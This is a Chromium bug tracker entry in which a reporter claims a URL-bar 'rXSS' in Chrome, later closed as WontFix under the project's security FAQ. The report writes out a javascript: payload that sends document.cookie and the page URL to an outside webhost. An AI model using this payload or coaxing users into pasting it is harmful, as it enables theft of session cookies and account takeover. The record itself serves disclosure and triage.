New issue
Advanced search Search tips

Issue 874291 link

Starred by 2 users
Status: WontFix
Owner: ----
Closed: Aug 15
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security



Sign in to add a comment

rXSS, Leveraginh URL Bar for DOCUMENT.COOKIE Extraction (GOOGLE CHROME)

Reported by benjamin...@gmail.com, Aug 15 


VULNERABILITY DETAILS
Using the payload 

javascript':window.location.href= 'http://hckerman.000webhostapp.com/CreateChar.php?CHARS=' + String(document.cookie) + '&url=' + window.location.href

and erasing the first '

Google chrome will load that as 

href="javascript:window.location.href= 'http://hckerman.000webhostapp.com/CreateChar.php?CHARS=' + String(document.cookie) + '&url=' + window.location.href"

or something along those lines.
This method will take social engineering or a small time frame of physical access to the device, but regardless this should not occur. In the attached video you will see the interception, of Facebook, mail.google.com, and Twitter cookies. 


VERSION
Chrome Version: 68.0.3440.106
Operating System: Windows, and Chromeos (note: Potentialyl MAC, have not attempted)



REPRODUCTION CASE
Link of demonstration and reproduction: https://youtu.be/PNuoxYvEAVE

Comment 1 by benjamin...@gmail.com, Aug 15 

In the video I use a website to host get requests, and pull the document.cookie value from the url request.

Other browsers will not run "javascript:[commands] from the url bar, yet Chrome will. This can potentially yield the loss of confidentiality of data if a user loads this script by inserting the payload in the url bar at any given website. As you can see on the video, if the payload is put in the url bar while the user is on facebook, the associated cookies of facebook will be remotely sent to a webserver. The same goes for google, twitter, or any other website. This can be a major issue because its web application independent. Its a problem found and rooted in the chrome browser. Also as an update, I injected this payload into the chrome browser for iphone and it also ran. If you have any questions please feel free to ask.

Comment 2 by carlosil@chromium.org, Aug 15

Status: WontFix (was: Unconfirmed)
Hi, thanks for the report, however we do not consider entering Javascript in the URL bar as a vulnerability, you can read more about it at: https://dev.chromium.org/Home/chromium-security/security-faq#TOC-Does-entering-JavaScript:-URLs-in-the-URL-bar-or-running-script-in-the-developer-tools-mean-there-s-an-XSS-vulnerability-

Comment 3 by benjamin...@gmail.com, Aug 15 

Sorry, I apologize for the inconvenient report. I'll ensure to read the guidelines thoroughly prior to reporting again.
Thank you
Project Member

Comment 4 by sheriffbot@chromium.org, Nov 22

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment